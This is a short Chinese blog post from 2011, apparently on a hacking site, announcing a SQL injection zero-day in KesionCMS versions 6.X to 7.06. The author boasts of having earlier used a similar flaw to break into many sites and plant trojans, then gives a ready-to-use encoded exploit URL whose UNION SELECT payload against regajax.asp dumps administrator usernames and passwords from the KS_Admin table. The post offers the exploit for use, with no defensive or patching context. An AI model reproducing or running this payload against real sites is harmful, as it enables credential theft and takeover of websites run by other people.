科汛CMS 6.X-7.06最新注入0day

分类:安全 | 2011-07-30 | 撸过 120 次
0人扯谈

kesionCMS用的人非常多哦。经常也被暴洞。记得几年前藏着一个科汛的HTTP头注入

0day日了好多站,那时候多喜欢挂驴。搞了好多黄色图片站来挂。

这次暴的洞是T00LS的核心先发的。然后论坛一个社工牛给社了后研究出来的。

直接暴管理员帐号和密码的EXP:

https://www.webshell.cc/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
本站内容均为原创,转载请务必保留署名与链接!
科汛CMS 6.X-7.06最新注入0day:https://www.webshell.cc/1.html

随机日志